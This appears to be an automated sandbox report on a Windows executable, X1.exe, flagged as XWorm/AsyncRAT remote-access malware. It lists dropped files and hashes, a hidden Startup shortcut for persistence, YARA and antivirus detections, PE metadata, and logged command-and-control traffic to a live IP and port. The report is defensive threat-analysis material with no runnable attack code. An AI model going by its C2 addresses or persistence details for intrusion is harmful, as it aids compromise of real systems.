                                                                              Category:modified
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:@...e...........................................................

                                                                              C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\X1.exe
                                                                              File Type:Generic INItialization configuration [WIN]
                                                                              Category:modified
                                                                              Size (bytes):64
                                                                              Entropy (8bit):3.6722687970803873
                                                                              Encrypted:false
                                                                              SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                                              MD5:DE63D53293EBACE29F3F54832D739D40
                                                                              SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                                              SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                                              SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                                              Malicious:false
                                                                              Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_123w2fkx.ikl.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cxmc25w.4f1.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d2fw2xi.5gv.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgs3p5sl.o23.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evwaaysc.nmp.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fphbjhmb.yg2.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iy1lxs5y.h1y.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ql5jmojq.uno.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzifhzxd.zaq.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sycgtlw4.p4f.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t052sswx.rqc.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxg5afyd.ynp.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnk

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\X1.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:55:18 2024, mtime=Tue Apr 23 23:55:21 2024, atime=Tue Apr 23 23:55:21 2024, length=48128, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):736
                                                                              Entropy (8bit):5.030169276645594
                                                                              Encrypted:false
                                                                              SSDEEP:12:8bMs4fiby88CFlsY//7jL0QHkrEjAvoHHcNhplmV:8bAfop8yZr0QHAvoc3plm
                                                                              MD5:EB58EB76080A558EF785B8EE27140696
                                                                              SHA1:B7D9CB9B7C9C9312F680838297B8CC176892AA4E
                                                                              SHA-256:655AC8DD3AACE9B95498A4865F6D4E938C830119F0AD54EB246F8B9F705E0193
                                                                              SHA-512:3D4EEC4A005E3F6A8427A2F6B2A514A6F9D534030758A043B26423AC0EDE9C5C46782C0CB65E25DFEBE630BE98F10CDDE4CA9CEBAD7B1AA0C92C69DA81011A8E
                                                                              Malicious:false
                                                                              Preview:L..................F.... ...<........&......&............................h.:..DG..Yr?.D..U..k0.&...&...... M......NS....At(........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C......................f*.R.o.a.m.i.n.g.....T.2......X.. .X1.exe..>......X...X.............................&..X.1...e.x.e.......U...............-.......T...........|.Q......C:\Users\user\AppData\Roaming\X1.exe........\.....\.....\.....\.....\.X.1...e.x.e.`.......X.......571345...........hT..CrF.f4... ...2=.b...,...W..hT..CrF.f4... ...2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                              C:\Users\user\AppData\Roaming\X1.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\X1.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):48128
                                                                              Entropy (8bit):5.612164592786903
                                                                              Encrypted:false
                                                                              SSDEEP:768:Jl9f2fd1G1JlnDs8PvGT0Wk8Q0SSP9wTwTLuHFNg9hR8We6+OAhSYgX7WsP6:5ujG1JBDvTn0mwOFW9QWe6+OA7gRi
                                                                              MD5:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              SHA1:53F0A2FDDE2F1FE6E1AD44B87B8325624CDEB3FA
                                                                              SHA-256:1F204B43ACFDF5D1088F37B2159D98D5500BDAEEC99CD3F0D6E8CEB77282351B
                                                                              SHA-512:677CF83B6ED165D8BA5734E95BB1B53305CC69CD6A98EDD26F2D8CA75978828D734B36739DBB58BF5B7830FE9C6FF894D4D9BF2AEBE7285BA1C7DE73F5C90E8D
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                              • Antivirus: Virustotal, Detection: 71%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'f................................. ........@.. ....................... ............@.................................D...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........j..,f............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):5.612164592786903
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              File name:X1.exe
                                                                              File size:48'128 bytes
                                                                              MD5:2ab2f26ab78dbd53cea3b71c00d568c2
                                                                              SHA1:53f0a2fdde2f1fe6e1ad44b87b8325624cdeb3fa
                                                                              SHA256:1f204b43acfdf5d1088f37b2159d98d5500bdaeec99cd3f0d6e8ceb77282351b
                                                                              SHA512:677cf83b6ed165d8ba5734e95bb1b53305cc69cd6a98edd26f2d8ca75978828d734b36739dbb58bf5b7830fe9c6ff894d4d9bf2aebe7285ba1c7de73f5c90e8d
                                                                              SSDEEP:768:Jl9f2fd1G1JlnDs8PvGT0Wk8Q0SSP9wTwTLuHFNg9hR8We6+OAhSYgX7WsP6:5ujG1JBDvTn0mwOFW9QWe6+OA7gRi
                                                                              TLSH:1D232A853BE54A15D6FFABB92872A2020631F9079D13EB4E0CD4959B2F37B804E817D6
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'f................................. ........@.. ....................... ............@................................

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x40d09e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6627F5B0 [Tue Apr 23 17:53:52 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd0440x57.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x4c8.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000xb0a40xb200ddacac4e4cf2f6f6b1df5d4f6be90f60False0.4819390800561798data5.716386442506442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xe0000x4c80x60009d752f2a3b39c09403ff82b3d42639cFalse0.373046875data3.6850500375464827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x100000xc0x2008c2019ac91dbd61fba31f9674aa4b2f9False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0xe0a00x234data0.4734042553191489
                                                                              RT_MANIFEST0xe2d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              04/24/24-02:56:33.471440TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M244424971491.92.252.220192.168.2.5
                                                                              04/24/24-02:56:33.471440TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes44424971491.92.252.220192.168.2.5
                                                                              04/24/24-02:55:52.480977TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497144442192.168.2.591.92.252.220

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 24, 2024 02:54:41.276860952 CEST4970480192.168.2.5208.95.112.1
                                                                              Apr 24, 2024 02:54:41.436501026 CEST8049704208.95.112.1192.168.2.5
                                                                              Apr 24, 2024 02:54:41.436619043 CEST4970480192.168.2.5208.95.112.1
                                                                              Apr 24, 2024 02:54:41.468682051 CEST4970480192.168.2.5208.95.112.1
                                                                              Apr 24, 2024 02:54:41.628637075 CEST8049704208.95.112.1192.168.2.5
                                                                              Apr 24, 2024 02:54:41.683321953 CEST4970480192.168.2.5208.95.112.1
                                                                              Apr 24, 2024 02:55:15.784603119 CEST8049704208.95.112.1192.168.2.5
                                                                              Apr 24, 2024 02:55:22.328438997 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:22.328475952 CEST44349710149.154.167.220192.168.2.5
                                                                              Apr 24, 2024 02:55:22.328633070 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:22.339996099 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:22.340029955 CEST44349710149.154.167.220192.168.2.5
                                                                              Apr 24, 2024 02:55:22.956801891 CEST44349710149.154.167.220192.168.2.5
                                                                              Apr 24, 2024 02:55:22.956911087 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:22.961707115 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:22.961718082 CEST44349710149.154.167.220192.168.2.5
                                                                              Apr 24, 2024 02:55:22.961982012 CEST44349710149.154.167.220192.168.2.5
                                                                              Apr 24, 2024 02:55:23.011529922 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:23.024179935 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:23.072119951 CEST44349710149.154.167.220192.168.2.5
                                                                              Apr 24, 2024 02:55:23.581770897 CEST44349710149.154.167.220192.168.2.5
                                                                              Apr 24, 2024 02:55:23.581851006 CEST44349710149.154.167.220192.168.2.5
                                                                              Apr 24, 2024 02:55:23.581990004 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:23.587398052 CEST49710443192.168.2.5149.154.167.220
                                                                              Apr 24, 2024 02:55:27.254093885 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:55:27.552328110 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:55:27.552412033 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:55:27.581072092 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:55:27.919199944 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:55:33.474509001 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:55:33.527565956 CEST497144442192.168.2.591.92.252.220
